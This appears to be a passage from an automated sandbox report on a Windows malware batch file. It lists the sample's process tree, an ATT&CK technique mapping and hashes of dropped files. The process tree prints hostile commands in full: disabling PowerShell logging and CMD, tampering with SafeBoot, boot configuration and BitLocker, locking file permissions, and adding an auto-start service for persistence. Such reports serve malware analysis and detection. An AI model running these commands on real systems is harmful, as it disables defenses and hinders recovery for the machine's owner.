C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ExecutionPolicy" /t REG_SZ /d "Undefined" /f
2⤵
PID:6100

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell" /v "ScriptBlockLogging" /t REG_DWORD /d 0 /f
2⤵
PID:5212

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AlternateShell" /ve /d "Empty" /f
2⤵
PID:5248

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal" /ve /d "Empty" /f
2⤵
PID:5320

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f
2⤵
PID:5336

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
2⤵
- Modifies data under HKEY_USERS
PID:5424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig | findstr IPv4
2⤵
PID:5492

C:\Windows\system32\ipconfig.exe
ipconfig
3⤵
- Gathers network information
PID:5584

C:\Windows\system32\findstr.exe
findstr IPv4
3⤵
PID:5636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c whoami
2⤵
PID:5660

C:\Windows\system32\whoami.exe
whoami
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net user "GSAGMHCQ$"
2⤵
PID:4132

C:\Windows\system32\net.exe
net user "GSAGMHCQ$"
3⤵
PID:5724

C:\Windows\system32\takeown.exe
takeown /f "C:\Windows\System32\notepad.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\system32\icacls.exe
icacls "C:\Windows\System32\notepad.exe" /deny Everyone:(RX)
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5832

C:\Windows\system32\manage-bde.exe
manage-bde -off C:
2⤵
PID:5888

C:\Windows\system32\manage-bde.exe
manage-bde -on C: -exclude "C:\Windows" -exclude "C:\Users" -exclude "C:\Program Files" -exclude "C:\Program Files (x86)"
2⤵
PID:3384

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled yes
2⤵
- Modifies boot configuration data using bcdedit
PID:5924

C:\Windows\system32\bcdedit.exe
bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
2⤵
- Modifies boot configuration data using bcdedit
PID:6024

C:\Windows\system32\sc.exe
sc create MiServicio binPath= "C:\Users\Admin\AppData\Local\Temp\malware.bat" start= auto obj= "LocalSystem" DisplayName= "Mi Servicio"
2⤵
- Launches sc.exe
PID:6028

C:\Windows\system32\net.exe
net start MiServicio
2⤵
PID:6072

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start MiServicio
3⤵
PID:6124

C:\Windows\system32\takeown.exe
takeown /F "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe"
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:5208

C:\Windows\system32\icacls.exe
icacls "C:\Windows\system32\WindowsPowerShell\v1.0\powershell_ise.exe" /grant administrators:F
2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5132

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5668

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5776

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1212

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

File and Directory Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
612a6c4247ef652299b376221c984213

SHA1
d306f3b16bde39708aa862aee372345feb559750

SHA256
9d8e24c91cff338e56b518a533cb2e49a2803356bbf6e04892fb168a7ce2844a

SHA512
34a14d63abb1e3fe0f9927a94393043d458fe0624843e108d290266f554018e6379cba924cb5388735abdd6c5f1e2e318478a673f3f9b762815a758866d10973

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
56641592f6e69f5f5fb06f2319384490

SHA1
6a86be42e2c6d26b7830ad9f4e2627995fd91069

SHA256
02d4984e590e947265474d592e64edde840fdca7eb881eebde3e220a1d883455

SHA512
c75e689b2bbbe07ebf72baf75c56f19c39f45d5593cf47535eb722f95002b3ee418027047c0ee8d63800f499038db5e2c24aff9705d830c7b6eaa290d9adc868

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
5KB

MD5
44a9e5bc99eae7d104760cbd47ca8ef6

SHA1
25a50a8081c1c7cba6275057b988a47a7e050767

SHA256
668e376ad599377178c739cc05d98ecbfda02d2610552bcbcd541a9e4bed014d

SHA512
308b4091e2816f0f45acc4bacfe38029d3023b0e4b26fa94dbaff79fe96acec783b6ecec6e773e9cb091a4a1d2117d8f8dd90b813062587362783e9e27f14b0c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
03ae9bb6c219caa53a9da30c0942e6c1

SHA1
d7a5f009ffa9b3f365d0635d9a0b6f6e6b984d4b

SHA256
b80f3b660d2e4a70d927756eb8e35ed098edea56a3451ebaa452da09e003a70b

SHA512
78b0538a503d6daa3a6e924e5f531f45900032ae49c265f23ec3409dcae2a4a6c243e5b1b14ae4bacc08db016e43e53a69aa68146258d9ba81c8005c3dd5ce61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
68542f16ae77fdf530e0ea6fb8b28c61

SHA1
99b6d73c86d0503654cbce7299412729e60dbd33

SHA256
04bb53681d8fc59fd452723fd623dd948e760ccdae1f65d72a3e9ecfd5878043

SHA512
d257d4dc520cd60c95c85cb2ca67047e2b1cfb661b34c8bff165cfdeb7567ddd0380a5ee21ab42c30baad18a3526e591e42d7810b2d66696eafec105264368cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
9b0d0d79d0bbef03f6d943f6a8af8378

SHA1
e3fb64a682ff88397cbc3f4a48057b5c638fad5d

SHA256
9191424a02c75865d3c4af64b98ad85ededa47d09182101031cdcbe2fea69843

SHA512
aae89565e6b6ac9508bfa08b1fda7ac6bc763737eeaa5d13a74e96791d8e75139991c5696ff94e784cf410b2536aa4f98791612d73461f01675dda8c18f2db0f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
6757b360beeb307e0fba49d6e600536c

SHA1
394c0bb999075a60f4f016411b318a0d8b4c697c

SHA256
c0ecaa9619175a753a17566228d83af27deec6ba63b4d878ec2308c6138aef19

SHA512
091892e71257a3bfc94da16e7119921a136f1c9efa1031bff4bd273519d8dfec3ee76c79ed0eb81b7a6a90ad1fe66bd9201510c97a7cbdaedd88d18335bc8c68

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2f55tg2t.qdv.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\disable_winload.reg
Filesize
91B

MD5
47b5ae368c4aff20eafa90ffdcd03a34

SHA1
dff7d41c3d4a68e9e633b671b4a4c7fcb40c8f81

SHA256
aaf7fcebf2aa8e1ebd7bff75c05ab14951a6c7f7a37e9db0a15403cb491b3e07

SHA512
c4b8ad90b868aefea7b95701b1d4a5d6239d0fe452fad25df4fe6c8928c529d99225930d3fe2941b10bd6b07eef05aff9fd443a836638fc4916372d2588c136f

Download Submit
C:\Users\Admin\AppData\Local\Temp\malware.bat
Filesize
7KB

MD5
e7fffbf1e3fe60a678f8124b61dd75d2

SHA1
f2296600d68912d6e6460669e2c9109d5193c71c

SHA256
11b79791eb44fbdcd4e8be16dd966cafe1511ce70485d26f4fd0f87fbad0a326

SHA512
3835271d92716cf4be33b50cb1e4496ca3f4268a6c0614130da5f0e05a2f96b4803bf36a1bb61ba4f4a11a0a34cbb9c316c91d9adb93e33062ad370cc64e58a9

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db
Filesize
1024KB

MD5
3f9ef71f47262bdc5860a7ec807267f5

SHA1
2e34096661899ef1a1ff24709ac0d4d46654d6eb

SHA256
72371f11f867bab70b1c4667b5d13c74ec619f62cc7125d21501c96a9269b473

SHA512
fefce0071811ffa25e4d41513d446e7c2bdb0d1d1f8c11afcf01fc22d5dbb7e6f4c510e0bd9d8b9327389610fb1c041e7ea9acc3938cf9f38b54083b3eaa7ef8

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db
Filesize
7KB

MD5
175e99711986f1ded690b3be3798ac2a

SHA1
2d1a183e78bf0c7ce6b0e3422ae353225ed4f550

SHA256
7c921f9179864c1aa7452a116349adc035720a3d499ec00492e0c8b3d938709c

SHA512
6b22a5ddc73bfacdfd5a7e8a24b394e43ce278b429d27424a6fc7f42cbe7b1ebb3db3d146630ad45451fdb6063303d156f39fae2dec9a89a945d2c50a7106eeb

Download Submit
\??\pipe\LOCAL\crashpad_4128_RKJFAYEECGTBODNT
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/4984-0-0x000001B1225D0000-0x000001B1225F2000-memory.dmp

Filesize
136KB

Download
memory/5008-37-0x000001A7688A0000-0x000001A7688BE000-memory.dmp

Filesize
120KB

Download
memory/5008-34-0x000001A7688A0000-0x000001A7688BE000-memory.dmp

Filesize
120KB

Download